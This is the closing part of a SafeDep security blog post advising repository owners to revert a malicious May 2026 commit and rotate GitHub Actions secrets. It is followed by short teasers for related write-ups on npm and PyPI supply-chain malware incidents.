If your repository received a commit from [email protected] or [email protected] on May 18, 2026: revert it, audit your workflow files, and rotate any secrets available to GitHub Actions runners. Check your Actions tab for unexpected workflow_dispatch runs. If you use OIDC federation for cloud deployments, review cloud audit logs for token requests from unknown workflow runs.
- malware
- npm
- supply-chain
- ci-cd
- secret-exfiltration
- github-actions
Author
SafeDep Team
safedep.io
Share
The Latest from SafeDep blogs
Follow for the latest updates and insights on open source security & engineering

Polymarket npm Packages Steal Crypto Wallet Keys
Nine coordinated npm packages target Polymarket traders with a social-engineered postinstall prompt that exfiltrates raw private keys to a Cloudflare Worker. The attacker published all packages...

Malicious durabletask on PyPI: Multi-Cloud Credential Stealer with Worm Capabilities
Three compromised versions of the Microsoft durabletask Python SDK (1.4.1, 1.4.2, 1.4.3) were published to PyPI, each downloading a stage-2 payload that steals credentials from AWS, Azure, GCP,...

art-template npm Hijack Delivers iOS Browser Exploit Kit
art-template versions 4.13.3 through 4.13.6 were compromised via maintainer account takeover. The browser bundle injects scripts that deliver a full iOS exploit kit: WebAssembly type confusion, JIT...

Mini Shai-Hulud Strikes Again: 317 npm Packages Compromised
A compromised npm maintainer account published 637 malicious versions across 317 packages including size-sensor, echarts-for-react, timeago.js, and hundreds of @antv scoped packages, affecting 15M+...

Ship Code.
Not Malware.
Start free with open source tools on your machine. Scale to a unified platform for your organization.
